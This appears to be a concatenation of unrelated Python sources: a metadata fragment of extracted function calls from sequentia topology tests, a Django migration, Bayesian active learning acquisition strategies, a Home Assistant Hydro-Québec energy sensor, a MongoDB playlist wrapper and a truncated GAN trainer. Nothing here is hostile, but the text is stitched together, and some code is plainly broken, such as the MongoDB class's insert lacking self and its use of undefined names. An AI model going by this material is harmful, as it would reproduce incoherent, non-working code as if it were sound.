sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((11434, 11479), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(1)', 'random_state': 'rng'}), '(n_states=1, random_state=rng)\n', (11449, 11479), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((11756, 11801), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(2)', 'random_state': 'rng'}), '(n_states=2, random_state=rng)\n', (11771, 11801), False, 
'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((12132, 12177), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (12147, 12177), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((12910, 12955), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (12925, 12955), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((13331, 13376), 'sequentia.classifiers._LinearTopology', '_LinearTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (13346, 13376), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((734, 749), 'numpy.array', 'np.array', (['[1.0]'], {}), '([1.0])\n', (742, 749), True, 'import pytest, warnings, numpy as np\n'), ((1028, 1048), 'numpy.array', 'np.array', (['[0.5, 0.5]'], {}), '([0.5, 0.5])\n', (1036, 1048), True, 'import pytest, warnings, numpy as np\n'), ((1326, 1361), 'numpy.array', 'np.array', (['[0.2, 0.2, 0.2, 0.2, 0.2]'], {}), '([0.2, 0.2, 0.2, 0.2, 0.2])\n', (1334, 1361), True, 'import pytest, warnings, numpy as np\n'), ((1732, 1747), 'numpy.array', 'np.array', (['[1.0]'], {}), '([1.0])\n', (1740, 1747), True, 'import pytest, warnings, numpy as np\n'), ((2021, 2055), 'numpy.array', 'np.array', (['[0.57633871, 0.42366129]'], {}), '([0.57633871, 0.42366129])\n', (2029, 2055), True, 'import pytest, warnings, numpy as np\n'), ((2330, 2400), 'numpy.array', 'np.array', (['[0.15210286, 0.10647349, 0.20059295, 0.11120171, 0.42962898]'], {}), '([0.15210286, 0.10647349, 0.20059295, 0.11120171, 0.42962898])\n', (2338, 2400), True, 'import pytest, warnings, numpy as np\n'), ((2928, 2945), 
'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (2936, 2945), True, 'import pytest, warnings, numpy as np\n'), ((3264, 3298), 'numpy.array', 'np.array', (['[[0.5, 0.5], [0.0, 1.0]]'], {}), '([[0.5, 0.5], [0.0, 1.0]])\n', (3272, 3298), True, 'import pytest, warnings, numpy as np\n'), ((3626, 3806), 'numpy.array', 'np.array', (['[[0.2, 0.2, 0.2, 0.2, 0.2], [0.0, 0.25, 0.25, 0.25, 0.25], [0.0, 0.0, \n 0.33333333, 0.33333333, 0.33333333], [0.0, 0.0, 0.0, 0.5, 0.5], [0.0, \n 0.0, 0.0, 0.0, 1.0]]'], {}), '([[0.2, 0.2, 0.2, 0.2, 0.2], [0.0, 0.25, 0.25, 0.25, 0.25], [0.0, \n 0.0, 0.33333333, 0.33333333, 0.33333333], [0.0, 0.0, 0.0, 0.5, 0.5], [\n 0.0, 0.0, 0.0, 0.0, 1.0]])\n', (3634, 3806), True, 'import pytest, warnings, numpy as np\n'), ((4366, 4383), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (4374, 4383), True, 'import pytest, warnings, numpy as np\n'), ((4699, 4747), 'numpy.array', 'np.array', (['[[0.23561633, 0.76438367], [0.0, 1.0]]'], {}), '([[0.23561633, 0.76438367], [0.0, 1.0]])\n', (4707, 4747), True, 'import pytest, warnings, numpy as np\n'), ((5086, 5340), 'numpy.array', 'np.array', (['[[0.23169814, 0.71716356, 0.02033845, 0.02516204, 0.00563782], [0.0, \n 0.19474072, 0.16405008, 0.22228532, 0.41892388], [0.0, 0.0, 0.42912755,\n 0.16545797, 0.40541448], [0.0, 0.0, 0.0, 0.109713, 0.890287], [0.0, 0.0,\n 0.0, 0.0, 1.0]]'], {}), '([[0.23169814, 0.71716356, 0.02033845, 0.02516204, 0.00563782], [\n 0.0, 0.19474072, 0.16405008, 0.22228532, 0.41892388], [0.0, 0.0, \n 0.42912755, 0.16545797, 0.40541448], [0.0, 0.0, 0.0, 0.109713, 0.890287\n ], [0.0, 0.0, 0.0, 0.0, 1.0]])\n', (5094, 5340), True, 'import pytest, warnings, numpy as np\n'), ((5864, 5889), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (5877, 5889), False, 'import pytest, warnings, numpy as np\n'), ((6724, 6741), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (6732, 6741), True, 'import pytest, warnings, numpy as np\n'), ((7052, 7086), 
'numpy.array', 'np.array', (['[[0.5, 0.5], [0.5, 0.5]]'], {}), '([[0.5, 0.5], [0.5, 0.5]])\n', (7060, 7086), True, 'import pytest, warnings, numpy as np\n'), ((7406, 7556), 'numpy.array', 'np.array', (['[[0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2,\n 0.2], [0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2]]'], {}), '([[0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, \n 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2], [0.2, 0.2, 0.2, 0.2, 0.2]])\n', (7414, 7556), True, 'import pytest, warnings, numpy as np\n'), ((8021, 8038), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (8029, 8038), True, 'import pytest, warnings, numpy as np\n'), ((8346, 8406), 'numpy.array', 'np.array', (['[[0.9474011, 0.0525989], [0.85567599, 0.14432401]]'], {}), '([[0.9474011, 0.0525989], [0.85567599, 0.14432401]])\n', (8354, 8406), True, 'import pytest, warnings, numpy as np\n'), ((8725, 9063), 'numpy.array', 'np.array', (['[[0.58715548, 0.14491542, 0.20980762, 0.00623944, 0.05188205], [0.0840705, \n 0.23055049, 0.08297536, 0.25124688, 0.35115677], [0.02117615, \n 0.37664662, 0.26705912, 0.09851123, 0.23660688], [0.01938041, \n 0.16853843, 0.52046123, 0.07535256, 0.21626737], [0.04996846, \n 0.44545843, 0.12079423, 0.07154241, 0.31223646]]'], {}), '([[0.58715548, 0.14491542, 0.20980762, 0.00623944, 0.05188205], [\n 0.0840705, 0.23055049, 0.08297536, 0.25124688, 0.35115677], [0.02117615,\n 0.37664662, 0.26705912, 0.09851123, 0.23660688], [0.01938041, \n 0.16853843, 0.52046123, 0.07535256, 0.21626737], [0.04996846, \n 0.44545843, 0.12079423, 0.07154241, 0.31223646]])\n', (8733, 9063), True, 'import pytest, warnings, numpy as np\n'), ((9491, 9516), 'pytest.warns', 'pytest.warns', (['UserWarning'], {}), '(UserWarning)\n', (9503, 9516), False, 'import pytest, warnings, numpy as np\n'), ((10310, 10327), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (10318, 10327), True, 'import pytest, warnings, numpy as np\n'), ((10635, 
10669), 'numpy.array', 'np.array', (['[[0.5, 0.5], [0.0, 1.0]]'], {}), '([[0.5, 0.5], [0.0, 1.0]])\n', (10643, 10669), True, 'import pytest, warnings, numpy as np\n'), ((10986, 11136), 'numpy.array', 'np.array', (['[[0.5, 0.5, 0.0, 0.0, 0.0], [0.0, 0.5, 0.5, 0.0, 0.0], [0.0, 0.0, 0.5, 0.5,\n 0.0], [0.0, 0.0, 0.0, 0.5, 0.5], [0.0, 0.0, 0.0, 0.0, 1.0]]'], {}), '([[0.5, 0.5, 0.0, 0.0, 0.0], [0.0, 0.5, 0.5, 0.0, 0.0], [0.0, 0.0, \n 0.5, 0.5, 0.0], [0.0, 0.0, 0.0, 0.5, 0.5], [0.0, 0.0, 0.0, 0.0, 1.0]])\n', (10994, 11136), True, 'import pytest, warnings, numpy as np\n'), ((11595, 11612), 'numpy.array', 'np.array', (['[[1.0]]'], {}), '([[1.0]])\n', (11603, 11612), True, 'import pytest, warnings, numpy as np\n'), ((11917, 11965), 'numpy.array', 'np.array', (['[[0.65157396, 0.34842604], [0.0, 1.0]]'], {}), '([[0.65157396, 0.34842604], [0.0, 1.0]])\n', (11925, 11965), True, 'import pytest, warnings, numpy as np\n'), ((12293, 12504), 'numpy.array', 'np.array', (['[[0.44455421, 0.55544579, 0.0, 0.0, 0.0], [0.0, 0.57553614, 0.42446386, 0.0,\n 0.0], [0.0, 0.0, 0.92014965, 0.07985035, 0.0], [0.0, 0.0, 0.0, \n 0.66790982, 0.33209018], [0.0, 0.0, 0.0, 0.0, 1.0]]'], {}), '([[0.44455421, 0.55544579, 0.0, 0.0, 0.0], [0.0, 0.57553614, \n 0.42446386, 0.0, 0.0], [0.0, 0.0, 0.92014965, 0.07985035, 0.0], [0.0, \n 0.0, 0.0, 0.66790982, 0.33209018], [0.0, 0.0, 0.0, 0.0, 1.0]])\n', (12301, 12504), True, 'import pytest, warnings, numpy as np\n'), ((13051, 13076), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (13064, 13076), False, 'import pytest, warnings, numpy as np\n'), ((5787, 5833), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (5803, 5833), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((9412, 9460), 'sequentia.classifiers._LeftRightTopology', '_LeftRightTopology', ([], {'n_states': '(5)', 
'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (9430, 9460), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n'), ((12974, 13020), 'sequentia.classifiers._ErgodicTopology', '_ErgodicTopology', ([], {'n_states': '(5)', 'random_state': 'rng'}), '(n_states=5, random_state=rng)\n', (12990, 13020), False, 'from sequentia.classifiers import _Topology, _LeftRightTopology, _ErgodicTopology, _LinearTopology\n')] |
# Generated by Django 2.2 on 2019-10-10 19:55
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration (2019-10-10): adds a boolean "finalizado" flag
    # to Orcamento and re-declares the default of OrdemDeServico.prazo_entrega.

    dependencies = [
        ('funilaria', '0008_auto_20191009_0904'),
    ]

    operations = [
        migrations.AddField(
            model_name='orcamento',
            name='finalizado',
            field=models.BooleanField(default=False),
        ),
        migrations.AlterField(
            model_name='ordemdeservico',
            name='prazo_entrega',
            # NOTE(review): the hard-coded timestamp is the value frozen in at
            # makemigrations time; the model likely intends a callable default
            # (e.g. timezone.now) — confirm against the model definition.
            field=models.DateField(default=datetime.datetime(2019, 10, 10, 16, 55, 5, 539559)),
        ),
    ]
| [
"datetime.datetime",
"django.db.models.BooleanField"
] | [((357, 391), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (376, 391), False, 'from django.db import migrations, models\n'), ((553, 603), 'datetime.datetime', 'datetime.datetime', (['(2019)', '(10)', '(10)', '(16)', '(55)', '(5)', '(539559)'], {}), '(2019, 10, 10, 16, 55, 5, 539559)\n', (570, 603), False, 'import datetime\n')] |
# https://arxiv.org/pdf/1703.02910.pdf, Deep Bayesian Active Learning with Image Data
import numpy as np
from .baseline import Strategy
from ..helpers.time import timeit
class BayesianActiveLearning(Strategy):
    """Monte-Carlo-dropout acquisition base class (Gal et al., 2017).

    Runs several stochastic forward passes over the unlabeled pool and lets
    subclasses turn the stacked predictions into per-sample scores.
    """

    def __init__(self, nb_forward=10, **kwargs):
        super(BayesianActiveLearning, self).__init__()
        self.nb_forward = nb_forward

    @timeit
    def evaluate_dataset(self, dataset, learner, log_time={}):
        """Stack class probabilities from `nb_forward` bayesian passes."""
        passes = []
        for _ in range(self.nb_forward):
            result = learner.inference(dataset, bayesian=True)
            passes.append(result['class_probabilities'])
        return np.stack(passes)

    @timeit
    def score_dataset(self, dataset, learner, log_time={}):
        """Acquisition score per sample; subclasses must implement this."""
        raise NotImplementedError

    def return_top_indices(self, dataset, learner, top, log_time={}):
        """Return indices of the `top` highest-scoring samples."""
        scores = self.score_dataset(dataset, learner, log_time=log_time)
        ranking = np.argsort(scores)
        return ranking[-top:]
class BayesianKLDivergence(BayesianActiveLearning):
    """Scores samples by mean KL divergence between each stochastic forward
    pass and the consensus (mean) prediction."""

    @timeit
    def score_dataset(self, dataset, learner, log_time={}):
        """Return one KL-based disagreement score per pool sample.

        PERF: replaces the original O(N*C) Python double loop with an
        equivalent vectorized NumPy expression (identical values).
        """
        # Assumed shape (nb_forward C, n_samples N, n_classes) — each pass
        # contributes one (N, n_classes) probability matrix. TODO confirm
        # against learner.inference.
        stacked_probabilities = self.evaluate_dataset(
            dataset, learner, log_time=log_time)
        consensus = np.mean(stacked_probabilities, axis=0)  # (N, n_classes)
        # KL(p_c || consensus) per pass c and sample i, summed over classes.
        divergences = np.sum(
            stacked_probabilities * np.log(stacked_probabilities / consensus[np.newaxis]),
            axis=2)  # (C, N)
        # Mean over the C passes, as in the original np.mean(..., axis=1)
        # on the transposed (N, C) array.
        return np.mean(divergences, axis=0)
class BayesianEntropyStrategy(BayesianActiveLearning):
    """Scores samples by the entropy of the MC-averaged class probabilities."""

    @timeit
    def score_dataset(self, dataset, learner, log_time={}):
        """Return the predictive entropy of each pool sample."""
        stacked = self.evaluate_dataset(dataset, learner, log_time=log_time)
        mean_probs = np.mean(stacked, axis=0)
        assert len(mean_probs) == len(dataset)
        return -np.sum(mean_probs * np.log(mean_probs), axis=1)
class BayesianBALDStrategy(BayesianActiveLearning):
    """BALD acquisition: entropy of the deterministic prediction minus the
    mean entropy of the stochastic passes."""

    @timeit
    def score_dataset(self, dataset, learner, log_time={}):
        """Return the BALD score of each pool sample."""
        model_probs = learner.inference(dataset)['class_probabilities']
        model_entropy = -np.sum(model_probs * np.log(model_probs), axis=1)
        stacked = self.evaluate_dataset(dataset, learner, log_time=log_time)
        per_pass_entropy = -np.sum(stacked * np.log(stacked), axis=2)
        expected_entropy = np.mean(per_pass_entropy, axis=0)
        return model_entropy - expected_entropy
| [
"numpy.argsort",
"numpy.mean",
"numpy.zeros",
"numpy.log"
] | [((828, 846), 'numpy.argsort', 'np.argsort', (['scores'], {}), '(scores)\n', (838, 846), True, 'import numpy as np\n'), ((1190, 1228), 'numpy.mean', 'np.mean', (['stacked_probabilities'], {'axis': '(0)'}), '(stacked_probabilities, axis=0)\n', (1197, 1228), True, 'import numpy as np\n'), ((1251, 1267), 'numpy.zeros', 'np.zeros', (['(N, C)'], {}), '((N, C))\n', (1259, 1267), True, 'import numpy as np\n'), ((1590, 1618), 'numpy.mean', 'np.mean', (['divergences'], {'axis': '(1)'}), '(divergences, axis=1)\n', (1597, 1618), True, 'import numpy as np\n'), ((1876, 1914), 'numpy.mean', 'np.mean', (['stacked_probabilities'], {'axis': '(0)'}), '(stacked_probabilities, axis=0)\n', (1883, 1914), True, 'import numpy as np\n'), ((2009, 2030), 'numpy.log', 'np.log', (['probabilities'], {}), '(probabilities)\n', (2015, 2030), True, 'import numpy as np\n'), ((2386, 2413), 'numpy.log', 'np.log', (['model_probabilities'], {}), '(model_probabilities)\n', (2392, 2413), True, 'import numpy as np\n'), ((1533, 1575), 'numpy.log', 'np.log', (['(probabilities_ic / probabilities_i)'], {}), '(probabilities_ic / probabilities_i)\n', (1539, 1575), True, 'import numpy as np\n'), ((2609, 2638), 'numpy.log', 'np.log', (['stacked_probabilities'], {}), '(stacked_probabilities)\n', (2615, 2638), True, 'import numpy as np\n')] |
import logging
import asyncio
import json
from datetime import datetime, timedelta
from dateutil import tz, relativedelta
from pyhydroquebec.error import PyHydroQuebecHTTPError
from pyhydroquebec.client import HydroQuebecClient
from pyhydroquebec.consts import (
CURRENT_MAP,
DAILY_MAP,
)
import voluptuous as vol
from homeassistant.exceptions import PlatformNotReady
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_USERNAME,
CONF_PASSWORD,
ENERGY_KILO_WATT_HOUR,
CONF_NAME,
CONF_MONITORED_VARIABLES,
TEMP_CELSIUS,
)
from homeassistant.helpers.entity import Entity
from homeassistant.helpers.aiohttp_client import async_get_clientsession
from homeassistant.util import Throttle
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)

# Timeout (seconds) passed to the pyhydroquebec HTTP client.
REQUESTS_TIMEOUT = 15

# Hydro-Québec data only changes a few times per day; throttle polling.
MIN_TIME_BETWEEN_UPDATES = timedelta(hours=6)
SCAN_INTERVAL = timedelta(hours=6)

CONF_CONTRACT = "contract"
# NOTE(review): these two re-definitions shadow the CONF_NAME and
# CONF_MONITORED_VARIABLES constants imported from homeassistant.const
# above; the values appear identical, so behavior is unaffected.
CONF_NAME = "name"
CONF_MONITORED_VARIABLES = "monitored_variables"

KILOWATT_HOUR = ENERGY_KILO_WATT_HOUR

# Valid sensor types: union of pyhydroquebec's current-period and daily maps.
SENSOR_TYPES = {**CURRENT_MAP, **DAILY_MAP}

# Platform configuration schema: credentials and contract are required;
# monitored_variables must be a subset of SENSOR_TYPES keys.
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
    {
        vol.Required(CONF_USERNAME): cv.string,
        vol.Required(CONF_PASSWORD): cv.string,
        vol.Required(CONF_CONTRACT): cv.string,
        vol.Optional(CONF_NAME): cv.string,
        vol.Optional(CONF_MONITORED_VARIABLES, default=[]): vol.All(
            cv.ensure_list, [vol.In(SENSOR_TYPES)]
        ),
    },
    extra=vol.ALLOW_EXTRA,
)
async def async_setup_platform(hass, config, async_add_entities, discovery_info=None):
    """Set up the HydroQuebec sensor platform from configuration."""
    _LOGGER.debug("Création du client")
    username = config.get(CONF_USERNAME)
    password = config.get(CONF_PASSWORD)
    contract = config.get(CONF_CONTRACT)
    monitored_variables = config.get(CONF_MONITORED_VARIABLES)
    time_zone = str(hass.config.time_zone)
    httpsession = async_get_clientsession(hass, False)

    # One shared data connector feeds every configured sensor; fetch once
    # before creating entities so they start with data.
    hqdata = HydroQuebecData(
        username, password, contract, time_zone, REQUESTS_TIMEOUT, httpsession
    )
    await hqdata.async_update()

    sensors = [HydroQuebecSensor(hqdata, sensor_type)
               for sensor_type in monitored_variables]
    async_add_entities(sensors, True)
    return True
class HydroQuebecSensor(Entity):
    """Implementation of a HydroQuebec sensor."""

    def __init__(self, hqdata, sensor_type):
        """Initialize the sensor from its SENSOR_TYPES metadata."""
        meta = SENSOR_TYPES[sensor_type]
        self.type = sensor_type
        self._client_name = "hydroquebec"
        self._name = meta["raw_name"]
        self._unit_of_measurement = meta["unit"]
        self._icon = meta["icon"]
        self._device_class = meta["device_class"]
        self.hqdata = hqdata
        self._state = None
        self._unique_id = f"{sensor_type}_{self._name}"
        _LOGGER.debug(f"init sensor {sensor_type}")

    @property
    def name(self):
        """Return the name of the sensor."""
        return f"{self._name}"

    @property
    def state(self):
        """Return the current value formatted to two decimals, or None.

        Sensor types prefixed with "perio" read from the current-period
        data; all others read from the daily data.
        """
        data = (self.hqdata.period if self.type.startswith("perio")
                else self.hqdata.daily)
        if data == {}:
            return None
        return "{:.2f}".format(data[self.type])

    @property
    def unit_of_measurement(self):
        """Return the unit of measurement of this entity, if any."""
        return self._unit_of_measurement

    @property
    def icon(self):
        """Icon to use in the frontend, if any."""
        return self._icon

    @property
    def device_class(self):
        """Home-Assistant device class."""
        return self._device_class

    @property
    def unique_id(self):
        """Stable id derived from sensor type and raw name."""
        return self._unique_id

    async def async_update(self):
        """Get the latest data from Hydroquebec and update the state."""
        await self.hqdata.async_update()
class HydroQuebecData:
    """Implementation of a HydroQuebec DataConnector.

    Holds the pyhydroquebec client plus the most recently fetched daily and
    current-period dictionaries, shared by all sensor entities.
    """

    def __init__(self, username, password, contract, time_zone, REQUESTS_TIMEOUT, httpsession):
        self._contract = contract
        self._hqclient = HydroQuebecClient(
            username, password, REQUESTS_TIMEOUT, httpsession # , 'DEBUG'
        )
        # Latest fetched data; empty dict means "no data yet".
        self._daily = {}
        self._period = {}
        self._tz = tz.gettz(time_zone)

    @property
    def daily(self):
        # Daily consumption dict for yesterday (keys from DAILY_MAP).
        return self._daily

    @property
    def period(self):
        # Current billing-period dict (keys from CURRENT_MAP).
        return self._period

    # Throttle prevents more than one real fetch per MIN_TIME_BETWEEN_UPDATES,
    # regardless of how many sensors call async_update().
    @Throttle(MIN_TIME_BETWEEN_UPDATES)
    async def async_update(self):
        """Get the latest data from Hydroquebec and update the state."""
        await self._hqclient.login()
        for customer in self._hqclient.customers:
            # Skip customers that don't match the configured contract.
            if customer.contract_id != self._contract and self._contract is not None:
                continue
            if self._contract is None:
                # NOTE(review): this warns for *every* customer and keeps
                # iterating, so with multiple customers the last one wins —
                # confirm whether a break was intended here.
                _LOGGER.warning(
                    "Contract id not specified, using first available.")
            try:
                # 27 hours back guarantees landing on yesterday's date even
                # across DST shifts in the configured timezone.
                yesterday = datetime.now(self._tz) - timedelta(hours=27)
                yesterday_str = yesterday.strftime("%Y-%m-%d")
                _LOGGER.debug(f"Fetching: {yesterday_str}")
                await customer.fetch_daily_data(yesterday_str, yesterday_str)
                await customer.fetch_current_period()
                curr = customer.current_daily_data
                #yesterday_date = list(curr.keys())[0]
                self._daily = curr[yesterday_str]
                period = customer.current_period
                self._period = period
            except Exception as e:
                # Deliberate best-effort: keep previous data on any failure.
                _LOGGER.warning(f"Exception: {e}")
        return
| [
"logging.getLogger",
"voluptuous.Required",
"dateutil.tz.gettz",
"homeassistant.util.Throttle",
"datetime.datetime.now",
"pyhydroquebec.client.HydroQuebecClient",
"voluptuous.In",
"datetime.timedelta",
"voluptuous.Optional",
"homeassistant.helpers.aiohttp_client.async_get_clientsession"
] | [((830, 857), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (847, 857), False, 'import logging\n'), ((908, 926), 'datetime.timedelta', 'timedelta', ([], {'hours': '(6)'}), '(hours=6)\n', (917, 926), False, 'from datetime import datetime, timedelta\n'), ((943, 961), 'datetime.timedelta', 'timedelta', ([], {'hours': '(6)'}), '(hours=6)\n', (952, 961), False, 'from datetime import datetime, timedelta\n'), ((2083, 2119), 'homeassistant.helpers.aiohttp_client.async_get_clientsession', 'async_get_clientsession', (['hass', '(False)'], {}), '(hass, False)\n', (2106, 2119), False, 'from homeassistant.helpers.aiohttp_client import async_get_clientsession\n'), ((4905, 4939), 'homeassistant.util.Throttle', 'Throttle', (['MIN_TIME_BETWEEN_UPDATES'], {}), '(MIN_TIME_BETWEEN_UPDATES)\n', (4913, 4939), False, 'from homeassistant.util import Throttle\n'), ((1198, 1225), 'voluptuous.Required', 'vol.Required', (['CONF_USERNAME'], {}), '(CONF_USERNAME)\n', (1210, 1225), True, 'import voluptuous as vol\n'), ((1246, 1273), 'voluptuous.Required', 'vol.Required', (['CONF_PASSWORD'], {}), '(CONF_PASSWORD)\n', (1258, 1273), True, 'import voluptuous as vol\n'), ((1294, 1321), 'voluptuous.Required', 'vol.Required', (['CONF_CONTRACT'], {}), '(CONF_CONTRACT)\n', (1306, 1321), True, 'import voluptuous as vol\n'), ((1342, 1365), 'voluptuous.Optional', 'vol.Optional', (['CONF_NAME'], {}), '(CONF_NAME)\n', (1354, 1365), True, 'import voluptuous as vol\n'), ((1386, 1436), 'voluptuous.Optional', 'vol.Optional', (['CONF_MONITORED_VARIABLES'], {'default': '[]'}), '(CONF_MONITORED_VARIABLES, default=[])\n', (1398, 1436), True, 'import voluptuous as vol\n'), ((4577, 4645), 'pyhydroquebec.client.HydroQuebecClient', 'HydroQuebecClient', (['username', 'password', 'REQUESTS_TIMEOUT', 'httpsession'], {}), '(username, password, REQUESTS_TIMEOUT, httpsession)\n', (4594, 4645), False, 'from pyhydroquebec.client import HydroQuebecClient\n'), ((4751, 4770), 'dateutil.tz.gettz', 
'tz.gettz', (['time_zone'], {}), '(time_zone)\n', (4759, 4770), False, 'from dateutil import tz, relativedelta\n'), ((1476, 1496), 'voluptuous.In', 'vol.In', (['SENSOR_TYPES'], {}), '(SENSOR_TYPES)\n', (1482, 1496), True, 'import voluptuous as vol\n'), ((5438, 5460), 'datetime.datetime.now', 'datetime.now', (['self._tz'], {}), '(self._tz)\n', (5450, 5460), False, 'from datetime import datetime, timedelta\n'), ((5463, 5482), 'datetime.timedelta', 'timedelta', ([], {'hours': '(27)'}), '(hours=27)\n', (5472, 5482), False, 'from datetime import datetime, timedelta\n')] |
import database
import pymongo
from pymongo import MongoClient
import copy
class Database(database.Database):
    """MongoDB-backed implementation of the radiowcs playlist database."""

    # Connection handles; populated by connect().
    client = None
    db = None
    collection = None
    recent = None

    # Connection settings.
    host = 'localhost'
    port = 27017
    timeout = 20
    database_name = 'radiowcs'
    authkey = ''
    table_name = 'playlist'
    table_recent = 'recent'

    def __init__(self):
        database.Database.__init__(self)

    def __enter__(self):
        return self

    def __exit__(self, type, value, traceback):
        # BUG FIX: the original referenced an undefined name `connection`
        # (NameError); close the MongoClient opened by connect(), if any.
        if self.client is not None:
            self.client.close()

    def connect(self):
        """Open the MongoDB connection and return (db, collection).

        BUG FIX: the original bound client/db/collection/recent to locals,
        so insert() and __exit__() could never see them; they are now
        stored on the instance.
        """
        self.client = MongoClient(self.host, self.port)
        self.db = self.client[self.database_name]
        self.collection = self.db[self.table_name]
        self.recent = self.db[self.table_recent]
        return self.db, self.collection

    def configure(self):
        """Not needed for mongodb."""
        pass

    def insert(self, item):
        """Insert a deep copy of `item` into the playlist collection.

        BUG FIX: the original signature was missing `self`, referenced the
        undefined global `collection`, and called `recent.insert()` with no
        document (TypeError). `insert_one` replaces the long-deprecated
        `Collection.insert`.
        """
        new_item = copy.deepcopy(item)
        self.collection.insert_one(new_item)
        # Presumably the recent table should receive the same document —
        # the original `recent.insert()` call had no arguments. TODO confirm.
        self.recent.insert_one(copy.deepcopy(item))
| [
"pymongo.MongoClient",
"database.Database.__init__",
"copy.deepcopy"
] | [((136, 168), 'database.Database.__init__', 'database.Database.__init__', (['self'], {}), '(self)\n', (162, 168), False, 'import database\n'), ((574, 607), 'pymongo.MongoClient', 'MongoClient', (['self.host', 'self.port'], {}), '(self.host, self.port)\n', (585, 607), False, 'from pymongo import MongoClient\n'), ((858, 877), 'copy.deepcopy', 'copy.deepcopy', (['item'], {}), '(item)\n', (871, 877), False, 'import copy\n')] |
import torch
from torchvision.utils import make_grid
import numpy as np
from base import BaseTrainer
from models import Generator, Discriminator
from losses import *
from data_loaders import CartoonDataLoader
from utils import MetricTracker
class ExpnameTrainer(BaseTrainer):
    """GAN trainer template: builds data loaders, generator/discriminator,
    optimizers, losses and metric trackers, and defines the epoch loops.

    NOTE(review): _train_epoch and _valid_epoch are deliberate stubs — each
    raises NotImplementedError at the top of its batch loop, with scaffold
    code left below as a guide for the implementer.
    """

    def __init__(self, config):
        super(ExpnameTrainer, self).__init__(config)

        self.logger.info("Creating data loaders...")
        self.train_dataloader, self.valid_dataloader = self._build_dataloader()
        # Log roughly sqrt(batch_size) times per epoch.
        self.log_step = int(np.sqrt(self.train_dataloader.batch_size))

        self.logger.info("Creating model architecture...")
        gen, disc = self._build_model()

        # resume
        # NOTE(review): _resume_checkpoint reads self.gen/self.disc, which are
        # only assigned below — resuming here would raise AttributeError.
        # The call should probably come after the models and optimizers exist.
        if self.config.resume is not None:
            self._resume_checkpoint(config.resume)

        # move to device
        self.gen = gen.to(self.device)
        self.disc = disc.to(self.device)
        if len(self.device_ids) > 1:
            self.gen = torch.nn.DataParallel(self.gen, device_ids=self.device_ids)
            self.disc = torch.nn.DataParallel(self.disc, device_ids=self.device_ids)

        self.logger.info("Creating optimizers...")
        self.gen_optim, self.disc_optim = self._build_optimizer(self.gen, self.disc)

        # build loss
        self.logger.info("Creating losses...")
        self._build_criterion()

        self.logger.info("Creating metric trackers...")
        self._build_metrics()

    def _build_dataloader(self):
        # Returns (train_loader, valid_loader); validation is split off the
        # training loader.
        train_dataloader = CartoonDataLoader(
            data_dir=self.config.data_dir,
            src_style='real',
            tar_style=self.config.tar_style,
            batch_size=self.config.batch_size,
            image_size=self.config.image_size,
            num_workers=self.config.num_workers)
        valid_dataloader = train_dataloader.split_validation()
        return train_dataloader, valid_dataloader

    def _build_model(self):
        """ build generator and discriminator model """
        gen = Generator(self.config.image_size, self.config.down_size, self.config.num_res, self.config.skip_conn)
        disc = Discriminator(self.config.image_size, self.config.down_size)
        return gen, disc

    def _build_optimizer(self, gen, disc):
        """ build generator and discriminator optimizers """
        # betas=(0.5, 0.999) is the customary Adam setting for GAN training.
        gen_optim = torch.optim.AdamW(
            gen.parameters(),
            lr=self.config.g_lr,
            weight_decay=self.config.weight_decay,
            betas=(0.5, 0.999))
        disc_optim = torch.optim.AdamW(
            disc.parameters(),
            lr=self.config.d_lr,
            weight_decay=self.config.weight_decay,
            betas=(0.5, 0.999))
        return gen_optim, disc_optim

    def _build_criterion(self):
        # Instantiates e.g. "GANLoss" from config.adv_criterion == "GAN".
        # NOTE(review): eval() on a config string — fine for trusted configs,
        # but a lookup table of loss classes would be safer.
        self.adv_criterion = eval('{}Loss'.format(self.config.adv_criterion))()
        # TODO add extra criterion you need here

    def _build_metrics(self):
